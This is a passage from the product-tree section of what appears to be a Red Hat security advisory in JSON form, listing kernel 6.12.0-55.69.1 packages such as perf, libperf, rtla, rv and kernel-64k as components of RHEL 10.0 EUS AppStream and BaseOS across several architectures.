"product_id": "AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.src",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x"
},
